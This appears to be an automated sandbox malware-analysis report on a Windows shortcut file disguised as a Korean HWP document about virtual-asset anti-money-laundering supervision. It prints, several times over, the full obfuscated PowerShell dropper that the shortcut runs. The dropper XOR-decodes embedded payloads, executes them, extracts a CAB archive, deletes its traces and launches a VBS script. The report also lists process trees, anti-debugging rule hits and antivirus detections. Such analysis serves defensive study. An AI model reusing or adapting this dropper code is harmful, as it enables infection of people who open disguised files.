Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | April 3, 2025, 10:19 a.m. | April 3, 2025, 10:21 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" "C:\Users\test22\AppData\Local\Temp\가상자산 사업자 자금세탁방지 감독 방향.hwp.lnk"
2548-
cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" ) )
2660-
cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
2756-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
2812 -
findstr.exe findstr /i rshell.exe
2848
-
-
powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};"
2908-
expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\activity.cab -F:* C:\Users\Public\documents
3020
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\가상자산 사업자 자금세탁방지 감독 방향.hwp.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe |
cmdline | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe " |
cmdline | "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" ) ) |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe |
cmdline | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe " |
cmdline | "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" ) ) |
CTX | lnk.trojan.generic |
Skyhigh | BehavesLike.Dropper.tx |
Symantec | Scr.Mallnk!gen4 |
ESET-NOD32 | LNK/Agent.AHE |
TrendMicro-HouseCall | HEUR_LNKEXEC.A |
Avast | LNK:Agent-HN [Trj] |
Kaspersky | HEUR:Trojan.Multi.Agent.gen |
Rising | Trojan.PSRunner/LNK!1.DB7E (CLASSIC) |
TrendMicro | HEUR_LNKEXEC.A |
Sophos | Mal/PowLnkObf-A |
Detected | |
ZoneAlarm | Mal/PowLnkObf-A |
VBA32 | Trojan.Link.Crafted |
Tencent | Win32.Trojan.Agent.Kflw |
huorong | HEUR:Trojan/LNK.Runner.b |
Fortinet | LNK/Agent.AHE!tr |
AVG | LNK:Agent-HN [Trj] |
alibabacloud | Trojan:Win/Agent.AJM |
parent_process | powershell.exe | martian_process | "C:\Windows\system32\expand.exe" C:\Users\Public\activity.cab -F:* C:\Users\Public\documents |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Windows\System32\expand.exe |